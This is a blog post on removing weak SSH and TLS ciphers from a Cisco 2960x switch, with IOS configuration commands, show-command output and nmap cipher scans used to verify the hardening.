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" /><br />
<br />
<br />
MAC/Linux users will be using OpenSSh which also supports SSH V2. You may run into situations on MAC/Linux where the weak ciphers are used and OpenSSH won't connect.<br />
<br />
You will see a message similar to<br />
<pre><code>ssh mhubbard@10.20.1.7
Unable to negotiate with 10.20.1.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1</code></pre>
<pre><code> </code></pre>
This is easy to resolve:<br />
<br />
1. Open the SSH config file - gedit ~/.ssh/config<br />
2. Add the necessary host IP and ciphers. KEX is Key Exchange:<br />
host 10.20.1.7<br />
KexAlgorithms +diffie-hellman-group1-sha1<br />
Ciphers 3des-cbc<br />
<br />
On a really old switch, I ran into a host key exchange algorithm that I had never even heard of "ssh-dss". I had to add HostKeyAlgorithms=+ssh-dss to connect. <br />
<br />
If you will only log into this device once or twice you can use the following without modifying the SSH config file:
<br />
<pre><b><span style="font-size: large;"><span style="font-family: "courier new", "courier", monospace;"><pre><code class="html">ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 10.20.1.7</code></pre>
</span></span></b></pre>
You can use the "-G" switch and SSH will show you the ciphers that SSH is offering:
<b><span style="font-family: "courier new", "courier", monospace;"></span></b><br />
<pre><b><span style="font-family: "courier new", "courier", monospace;"><code class="html">ssh -G mhubbard@10.20.1.7</code></span></b></pre>
<br />
<br />
The OpenSSH site has a page dedicated to legacy ciphers<br />
<a href="https://www.openssh.com/legacy.html">openssh legacy ciphers</a><br />
<br />
<h3>
</h3>
<h3>
Removing weak SSH algorithms</h3>
<br />
All of the commands shown are from a 2960x running: <br />
Version 15.2(4)E8 - Mainstream deployment (MD) from 18-Mar-2019<br />
<br />
First, let's look at the default SSH setup<br />
<pre><b><code class="html">show ip ssh</code></b></pre>
SSH Enabled - version 1.99<br />
Authentication methods:publickey,keyboard-interactive,password<br />
Authentication Publickey Algorithms:x509v3-ssh-rsa,ssh-rsa<br />
Hostkey Algorithms:x509v3-ssh-rsa,ssh-rsa<br />
Encryption Algorithms:<span style="color: red;"><b>aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc,aes192-cbcc</b></span><br />
MAC Algorithms:<span style="color: red;"><b>hmac-sha1,hmac-sha1-96</b></span><br />
Authentication timeout: 120 secs; Authentication retries: 3<br />
Minimum expected Diffie Hellman key size : <span style="color: red;"><b>1024 bits</b></span><br />
IOS Keys in SECSH format(ssh-rsa, base64 encoded): TP-self-signed-1676064512<br />
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCjsPhP/zpPgra0d3wzzt8fDZnKL4sUtCh0DVmV0fH6<br />
m+/Xke7IRMvxg2OEk333uHlKD+Ww6w8D2eMOzY7/R6edHA4UtKXwohJN1OZKS1ltL4tDSZSIeLO3juOL<br />
GfxKBtvGd30Y2jzYYMmTQGP9u1VrKdQRKAU13/c+iOiQPi3Q4w== <br />
<br />
The "version 1.99" means that it supports SSH v1 and v2. We want to disable v1 and remove the cbc and 3Des ciphers. These are "Cipher Block Chain" algorithms and will cause a failure during a penetration test.<br />
<br />
From global configuration mode enter the following:<br />
<pre><code class="html">ip ssh version 2 !disable V1
ip ssh server algorithm encryption aes256-ctr aes128-ctr
ip ssh server algorithm mac hmac-sha1
no ip ssh server algorithm mac hmac-sha1-96</code></pre>
<br />
You should also perform the following to harden SSH<br />
<br />
<pre><code class="html">crypto key generate rsa modulus 4096 label SSH-KEYS
!Note that generating 4096 bit keys can take up to 3 minutes.
ip ssh rsa keypair-name SSH-KEYS !associate keys to SSH
!set minimum bit size for client connection
ip ssh dh min size 2048</code></pre>
<br />
<br />
Let's see what SSH looks like now:<br />
<pre><code class="html"><b>show ip ssh</b></code></pre>
SSH Enabled - version 2.0<br />
Authentication methods:publickey,keyboard-interactive,password<br />
Authentication Publickey Algorithms:x509v3-ssh-rsa,ssh-rsa<br />
Hostkey Algorithms:x509v3-ssh-rsa,ssh-rsa<br />
ip ssh server algorithm encryption <span style="color: red;"><b>aes256-ctr aes128-ctr</b></span><br />
MAC Algorithms:<span style="color: red;"><b>hmac-sha1</b></span><br />
Authentication timeout: 120 secs; Authentication retries: 3<br />
Minimum expected Diffie Hellman key size : <span style="color: red;"><b>2048 bits</b></span><br />
IOS Keys in SECSH format(ssh-rsa, base64 encoded): SSH-KEYS<br />
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC5KQxmPn8tyfK+9fq6NC75whEQD02POopz9SE/SKeP<br />
ibO8KM7kSVdwy7anUhmgiX5jGmpecTFoP+txdA+KuEszAL5x8aeNZsPAykqBU6JClIz3fnMKjgoIqFlZ<br />
mwhL0Qow4OGrd52EkRNRxAc2TYpBr5p0ICdaxeHd7etzgXjkwcZpQ1e2kqvV9XU94LBO1R93AgYYLCsT<br />
nFsKga4tvvikXqKuwe3tfWKzNfO4LY1mZE9FXecoNW0Kb8p4U/pO/w69oEbHmmH7BfgWSHCCVZlgBhcf<br />
DtJa+oVnqHrMwVza+ViTMQLghvt63zewvTN2I235K6W+GhgUmx6p+Q62Rsrfrc+4K5ECVKNf7fzmlg6X<br />
Zs+P3WKgP8rh2z7ObTT917pp1VXw4pUkeqCCtMEmkiICO0TzU1dXyuoEPNGeES8wxYOSdaMA0DGEL34p<br />
Ccb6hb1RQbHjSjQZfDOXaZ0UwXtVJ07v7PR7fOhFHem58w2P+qmCwnEYFZrZhizR1y1SUDxs6Z7vZV98<br />
cyoTo98dWG4WDGiHM1loLq3SA3OMfceq5g2waPVBNmpZlzXitCTern1bZ15zdLvhxY1589A/TaSZuMeP<br />
lhjQ1mlYp3qf0Jt7eoaWNPRV/i0VUaRfxNBefiNBI5pS8ybj3bhfWpZe8QOOMAHRahAPPI9PasOBuMHR<br />
<br />
In 2020, this is still pretty lame, but keep reading! Cisco has been adding newer ciphers and removing some deprecated ciphers in newer IOS versions. You can check what's available on your version using:<br />
<span style="font-family: "courier new", "courier", monospace;"></span><br />
<pre><span style="font-family: "courier new", "courier", monospace;"><code class="html">test(config)#ip ssh server algorithm encryption ?</code></span></pre>
<span style="font-family: "courier new", "courier", monospace;"> 3des-cbc Three-key 3DES in CBC mode</span><br />
<span style="font-family: "courier new", "courier", monospace;"> aes128-cbc AES with 128-bit key in CBC mode</span><br />
<span style="font-family: "courier new", "courier", monospace;"> aes128-ctr AES with 128-bit key in CTR mode</span><br />
<span style="font-family: "courier new", "courier", monospace;"> aes192-cbc AES with 192-bit key in CBC mode</span><br />
<span style="font-family: "courier new", "courier", monospace;"> aes192-ctr AES with 192-bit key in CTR mode</span><br />
<span style="font-family: "courier new", "courier", monospace;"> aes256-cbc AES with 256-bit key in CBC mode</span><br />
<span style="font-family: "courier new", "courier", monospace;"> aes256-ctr AES with 256-bit key in CTR mode</span><br />
<br />
<pre><span style="font-family: "courier new", "courier", monospace;"><code class="html">test(config)#ip ssh server algorithm mac ?</code></span></pre>
<span style="font-family: "courier new", "courier", monospace;"> hmac-sha1 HMAC-SHA1 (digest length = key length = 160 bits)</span><br />
<span style="font-family: "courier new", "courier", monospace;"> hmac-sha1-96 HMAC-SHA1-96 (digest length = 96 bits, key length = 160 bits)</span><br />
<br />
If you look at Authentication in the output you notice that Public key is an option. I wrote a blog showing how to use SSH keys instead of passwords -<br />
<a href="https://mwhubbard.blogspot.com/2015/07/authenticating-to-cisco-devices-using_92.html">Authenticating to Cisco devices using SSH keys</a><br />
<h3>
</h3>
<h3>
Weak SSL ciphers</h3>
<br />
First, we will look at the current secure server settings. To see all possible secure server settings: <br />
<pre><span style="font-family: "courier new", "courier", monospace;"><code class="html">sh ip http server</code></span></pre>
<span style="font-family: "courier new", "courier", monospace;"> all HTTP server all information</span><br />
<span style="font-family: "courier new", "courier", monospace;"> connection HTTP server connection information</span><br />
<span style="font-family: "courier new", "courier", monospace;"> external HTTP external registration</span><br />
<span style="font-family: "courier new", "courier", monospace;"> history HTTP server history information</span><br />
<span style="font-family: "courier new", "courier", monospace;"> secure HTTP secure server status information</span><br />
<span style="font-family: "courier new", "courier", monospace;"> session-module HTTP server application session module information</span><br />
<span style="font-family: "courier new", "courier", monospace;"> statistics HTTP server statistics information</span><br />
<span style="font-family: "courier new", "courier", monospace;"> status HTTP server status information</span><br />
<br />
<pre><code class="html">sh ip http server all</code> </pre>
HTTP server status: Disabled<br />
HTTP server port: 80<br />
HTTP server authentication method: local<br />
HTTP server access class: 0<br />
HTTP server base path: flash:/c2960x-universalk9-mz.152-4.E8/html<br />
HTTP server help root: <br />
Maximum number of concurrent server connections allowed: 16<br />
Maximum number of secondary server connections allowed: 5<br />
Server idle time-out: 180 seconds<br />
Server life time-out: 180 seconds<br />
Server session idle time-out: 180 seconds<br />
Maximum number of requests allowed on a connection: 25<br />
HTTP server active session modules: ALL<br />
HTTP secure server capability: Present<br />
HTTP secure server status: Enabled<br />
HTTP secure server port: 443<br />
HTTP secure server ciphersuite: <span style="color: red;"><b>dhe-aes-128-cbc-sha dhe-aes-256-cbc-sha<br /> edche-rsa-aes-256-cbc-sha edche-rsa-rc4-128-sha</b></span><br />
HTTP secure server client authentication: Disabled<br />
HTTP secure server trustpoint: <br />
HTTP secure server active session modules: ALL<br />
<br />
To see who is connected to the switch over TLS:<br />
<pre><b><code class="html">sh ip http server connection</code></b></pre>
<br />
HTTP server current connections:<br />
local-ipaddress:port remote-ipaddress:port in-bytes out-bytes<br />
192.168.10.31:443 192.168.10.211:55014 1394 586227<br />
<div><br /></div><div><br /></div>
<h3 style="text-align: left;">
Viewing available current cipher suites</h3>
<br />
<pre><font size="3"><b><span><span style="font-family: "courier new", "courier", monospace;"><span><code class="html">ip http secure-ciphersuite ?</code></span></span></span></b></font></pre>
<b><span style="font-size: x-normal;"><span style="font-family: "courier new", "courier", monospace;"><span style="font-size: x-normal;"><br /> aes-128-cbc-sha Encryption type tls_rsa_with_aes_cbc_128_sha<br /> ciphersuite<br /> aes-256-cbc-sha Encryption type tls_rsa_with_aes_cbc_256_sha<br /> ciphersuite<br /> dhe-aes-128-cbc-sha Encryption type tls_dhe_rsa_with_aes_128_cbc_sha<br /> ciphersuite<br /> dhe-aes-256-cbc-sha Encryption type tls_dhe_rsa_with_aes_256_cbc_sha<br /> ciphersuite<br /> edche-rsa-aes-256-cbc-sha Encryption type tls_ecdhe_rsa_aes_256_cbc_sha<br /> ciphersuite<br /> edche-rsa-rc4-128-sha Encryption type tls_ecdhe_rsa_rc4_128_sha<br /> ciphersuite<br /> null-sha Encryption type tls_rsa_with_null_sha ciphersuite</span></span></span></b><br />
<br />
<br />
Notice that rc4 and Null are supported!<br />
<br />
To verify what was being offered by the switch I ran the nmap ssl-cert and ciphers script.<br />
<pre><b><code class="html">sudo nmap --script ssl-cert,ssl-enum-ciphers -p 443 192.168.10.31</code></b></pre>
Nmap scan report for 10.241.3.40<br />
Host is up, received echo-reply ttl 254 (0.10s latency).<br />
Scanned at 2020-06-18 15:28:06 PDT for 3s<br />
<br />
PORT STATE SERVICE REASON<br />
443/tcp open https syn-ack ttl 254<br />
| ssl-cert: Subject: commonName=IOS-Self-Signed-Certificate-1302447744<br />
| Issuer: commonName=IOS-Self-Signed-Certificate-1302447744<br />
| Public Key type: rsa<br />
| Public Key bits: 1024<br />
| Signature Algorithm: sha1WithRSAEncryption<br />
| Not valid before: 2020-06-16T22:55:16<br />
| Not valid after: 2030-01-01T00:00:00<br />
| MD5: c522 61ff 31c4 c9aa 971d 7cfd 4eb7 14de<br />
| SHA-1: 50fb 7c7d d6a8 86c0 ba67 1293 11d7 f529 058e e1de<br />
| -----BEGIN CERTIFICATE-----<br />
| MIICKzCCAZSgAwIBAgIBATANBgkqhkiG9w0BAQUFADAxMS8wLQYDVQQDEyZJT1Mt<br />
| U2VsZi1TaWduZWQtQ2VydGlmaWNhdGUtMTMwMjQ0Nzc0NDAeFw0yMDA2MTYyMjU1<br />
| MTZaFw0zMDAxMDEwMDAwMDBaMDExLzAtBgNVBAMTJklPUy1TZWxmLVNpZ25lZC1D<br />
| ZXJ0aWZpY2F0ZS0xMzAyNDQ3NzQ0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB<br />
| gQDCgxwOBYowFY7GgS3Q81u6CRTzcaEb2SwZvzSsjTLmHPqrB7OYgGukAgs19+Xa<br />
| 8jRS3jY4Q492RtpyBAb4BU9naHXRKvD2zB5e9QDreeFOf73If6f8V/BtjqSozYZW<br />
| N0RPpgqIWVbgQbkr1eBbnXgE1/TO7czYcjae/OTSZwQL1QIDAQABo1MwUTAPBgNV<br />
| HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFDL08Ihv1OFKYBqkbHJ5wpXt3G7IMB0G<br />
| A1UdDgQWBBQy9PCIb9ThSmAapGxyecKV7dxuyDANBgkqhkiG9w0BAQUFAAOBgQCH<br />
| GxSZ29CUBrvCkDU4knDw9WmdLKqgMl88+dpZmOO758+o4B8lMT0f+Ixny7drFIJ7<br />
| rrkhrqpCHnLDJtXYcINiaKASs3tPIpQ21nQ1r5WTdW8GqaTVcOBIFG0KWlJGVmsF<br />
| RepCnGblGV/3mrUWImNU8xwY+uZS2vAFKAVXYVLk5w==<br />
|_-----END CERTIFICATE-----<br />
| ssl-enum-ciphers: <br />
| TLSv1.1: <br />
| ciphers: <br />
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A<br />
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A<br />
| compressors: <br />
| NULL<br />
| cipher preference: client<br />
| warnings: <br />
| Weak certificate signature: SHA1<br />
| TLSv1.2: <br />
| ciphers: <br />
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A<br />
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A<br />
| compressors: <br />
| NULL<br />
| cipher preference: client<br />
| warnings: <br />
| Weak certificate signature: SHA1<br />
|_ least strength: A<br />
465/tcp closed smtps reset ttl 254<br />
993/tcp closed imaps reset ttl 254<br />
995/tcp closed pop3s reset ttl 254<br />
3389/tcp closed ms-wbt-server reset ttl 254<br />
<br />
NSE: Script Post-scanning.<br />
NSE: Starting runlevel 1 (of 1) scan.<br />
Initiating NSE at 15:28<br />
Completed NSE at 15:28, 0.00s elapsed<br />
Read data files from: /usr/local/bin/../share/nmap<br />
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds<br />
Raw packets sent: 9 (372B) | Rcvd: 6 (232B)<br />
<br />
<br />
To secure TLS I upgraded to 15.2.7E2. This release allows TLS 1.0 and 1.1 to be disabled. To pass a penetration test you will need to disable both. Once the upgrade is complete run the following:<br />
<pre><span style="font-size: normal;"><b><span style="font-family: "courier new", "courier", monospace;"><code class="html">test(config)#ip http secure-ciphersuite ?</code></span></b></span></pre>
<span style="font-size: x-small;"><b><span style="font-family: "courier new", "courier", monospace;"> <span style="font-size: small;">aes-128-cbc-sha Encryption type tls_rsa_with_aes_cbc_128_sha ciphersuite</span></span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: "courier new", "courier", monospace;"> aes-256-cbc-sha Encryption type tls_rsa_with_aes_cbc_256_sha ciphersuite</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: "courier new", "courier", monospace;"> dhe-aes-128-cbc-sha Encryption type tls_dhe_rsa_with_aes_128_cbc_sha ciphersuite</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: "courier new", "courier", monospace;"> edche-rsa-aes-256-cbc-sha Encryption type tls_ecdhe_rsa_aes_256_cbc_sha ciphersuite</span></b></span><br />
<span style="font-size: small;"><b><span style="font-size: xx-small;"><span style="font-family: "courier new", "courier", monospace;"><br /></span></span></b></span>
<br />
<pre><span style="font-size: normal;"><b><span style="font-size: xx-normal;"><span style="font-family: "courier new", "courier", monospace;"><code class="html">test(config)#ip http secure-ciphersuite edche-rsa-aes-256-cbc-sha aes-256-cbc-sha</code></span></span></b></span></pre>
<pre><span style="font-size: x-normal;"><b><code class="html">test(config)#ip http tls-version ?</code></b></span></pre>
<span style="font-size: x-normal;"><b> TLSv1.0 Set TLSv1.0 version Only</b></span><br />
<span style="font-size: x-normal;"><b> TLSv1.1 Set TLSv1.1 version Only</b></span><br />
<span style="font-size: x-normal;"><b> TLSv1.2 Set TLSv1.2 version Only</b></span><br />
<pre><span style="font-size: x-normal;"><b><code class="html">test(config)#ip http tls-version tlsv1.2</code></b></span></pre>
To verify, I re-ran the nmap ssl-cert and ciphers scripts. This time only TLS 1.2 is enabled.
<br />
<pre><b><code class="html">sudo nmap --script ssl-cert,ssl-enum-ciphers -p 443 192.168.10.31</code></b></pre>
Nmap scan report for 192.168.10.31<br />
Host is up, received echo-reply ttl 254 (0.0072s latency).<br />
Scanned at 2020-06-18 15:50:03 PDT for 3s<br />
<br />
PORT STATE SERVICE REASON<br />
443/tcp open https syn-ack ttl 254<br />
| ssl-cert: Subject: commonName=IOS-Self-Signed-Certificate-1302447744<br />
| Issuer: commonName=IOS-Self-Signed-Certificate-1302447744<br />
| Public Key type: rsa<br />
| Public Key bits: 1024<br />
| Signature Algorithm: sha1WithRSAEncryption<br />
| Not valid before: 2020-06-16T22:55:16<br />
| Not valid after: 2030-01-01T00:00:00<br />
| MD5: c522 61ff 31c4 c9aa 971d 7cfd 4eb7 14de<br />
| SHA-1: 50fb 7c7d d6a8 86c0 ba67 1293 11d7 f529 058e e1de<br />
| -----BEGIN CERTIFICATE-----<br />
| MIICKzCCAZSgAwIBAgIBATANBgkqhkiG9w0BAQUFADAxMS8wLQYDVQQDEyZJT1Mt<br />
| U2VsZi1TaWduZWQtQ2VydGlmaWNhdGUtMTMwMjQ0Nzc0NDAeFw0yMDA2MTYyMjU1<br />
| MTZaFw0zMDAxMDEwMDAwMDBaMDExLzAtBgNVBAMTJklPUy1TZWxmLVNpZ25lZC1D<br />
| ZXJ0aWZpY2F0ZS0xMzAyNDQ3NzQ0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB<br />
| gQDCgxwOBYowFY7GgS3Q81u6CRTzcaEb2SwZvzSsjTLmHPqrB7OYgGukAgs19+Xa<br />
| 8jRS3jY4Q492RtpyBAb4BU9naHXRKvD2zB5e9QDreeFOf73If6f8V/BtjqSozYZW<br />
| N0RPpgqIWVbgQbkr1eBbnXgE1/TO7czYcjae/OTSZwQL1QIDAQABo1MwUTAPBgNV<br />
| HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFDL08Ihv1OFKYBqkbHJ5wpXt3G7IMB0G<br />
| A1UdDgQWBBQy9PCIb9ThSmAapGxyecKV7dxuyDANBgkqhkiG9w0BAQUFAAOBgQCH<br />
| GxSZ29CUBrvCkDU4knDw9WmdLKqgMl88+dpZmOO758+o4B8lMT0f+Ixny7drFIJ7<br />
| rrkhrqpCHnLDJtXYcINiaKASs3tPIpQ21nQ1r5WTdW8GqaTVcOBIFG0KWlJGVmsF<br />
| RepCnGblGV/3mrUWImNU8xwY+uZS2vAFKAVXYVLk5w==<br />
|_-----END CERTIFICATE-----<br />
| ssl-enum-ciphers: <br />
| TLSv1.2: <br />
| ciphers: <br />
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A<br />
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A<br />
| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 1024) - A<br />
| compressors: <br />
| NULL<br />
| cipher preference: client<br />
| warnings: <br />
| Weak certificate signature: SHA1<br />
|_ least strength: A<br />
<br />
NSE: Script Post-scanning.<br />
NSE: Starting runlevel 1 (of 1) scan.<br />
Initiating NSE at 15:50<br />
Completed NSE at 15:50, 0.00s elapsed<br />
Read data files from: /usr/local/bin/../share/nmap<br />
Nmap done: 1 IP address (1 host up) scanned in 2.99 seconds<br />
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)<br />
<br />
<h4>
Results</h4>
You can see that it still uses SHA1 as the certificate signature. You can use <a href="https://ciphersuite.info/">Ciphersuite Info</a> to compare different ciphers.<br />
<br />
<h3>
What about SSH?</h3>
Let's see what's new for SSH in 15.7.2E2.<br />
<pre><code class="html">ip ssh server algorithm mac ?</code></pre>
<span style="font-family: "courier new", "courier", monospace;"> hmac-sha1 HMAC-SHA1 (digest length = key length = 160 bits)<br /> hmac-sha1-96 HMAC-SHA1-96 (digest length = 96 bits, key length = 160 bits)<br /> hmac-sha2-256 HMAC-SHA2-256 (digest length = 256 bits, key length = 256<br /> bits)<br /> hmac-sha2-512 HMAC-SHA2-512 (digest length = 512 bits, key length = 512<br /> bits)</span><br />
<br />
<pre><code class="html">ip ssh serv algorithm encryption ?</code></pre>
<br />
<br />
3des-cbc Three-key 3DES in CBC mode<br />
aes128-cbc AES with 128-bit key in CBC mode<br />
aes128-ctr AES with 128-bit key in CTR mode<br />
aes192-cbc AES with 192-bit key in CBC mode<br />
aes192-ctr AES with 192-bit key in CTR mode<br />
aes256-cbc AES with 256-bit key in CBC mode<br />
aes256-ctr AES with 256-bit key in CTR mode<br />
<br />
<br />
Now we can eliminate the ancient HMAC-SHA1 and CBC ciphers from our switch!<br />
<br />
First, we will add the sha2 HMACs<br />
<pre><code class="html">ip ssh server algorithm mac hmac-sha2-256 hmac-sha2-512</code></pre>
<br />
Then remove the sha1 hmacs<br />
<pre><code class="html">no ip ssh server algorithm mac hmac-sha1
no ip ssh server algorithm mac hmac-sha1-96</code></pre>
<br />
And now the encryption<br />
<pre><code class="html">ip ssh server algorithm encryption aes256-ctr aes192-ctr aes128-ctr</code></pre>
<h3>
The results</h3>
<pre><code class="html">show ip ssh</code></pre>
<br />
SSH Enabled - version 2.0<br />
Authentication methods:publickey,keyboard-interactive,password<br />
Authentication Publickey Algorithms:x509v3-ssh-rsa,ssh-rsa<br />
Hostkey Algorithms:x509v3-ssh-rsa,ssh-rsa<br />
Encryption Algorithms:<span style="color: red;">aes256-ctr,aes192-ctr,aes128-ctr</span><br />
MAC Algorithms:<span style="color: red;">hmac-sha2-256,hmac-sha2-512</span><br />
KEX Algorithms:diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1<br />
Authentication timeout: 120 secs; Authentication retries: 3<br />
Minimum expected Diffie Hellman key size : 2048 bits<br />
IOS Keys in SECSH format(ssh-rsa, base64 encoded): SSH-KEYS<br />
Modulus Size : 4096 bits<br />
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDCsyuZ8/lMCNHSLREb6vGQoBVehYQQI0+eJlanuyq5<br />
f+iTqFcceR7vvXP14JhHmXe2lkygOZ8VIeilMJkpS8q748TaBL9QfmUAdDkbbk1wYPNKM2sLn/ACuerf<br />
ImNa4vQFNaP28zqaCMhre/Z0DCRJvDnOXs2fepQnQZ6ZvbOgwMRw6rvTiLcPYlB46VlaS6T1ogEbsPLz<br />
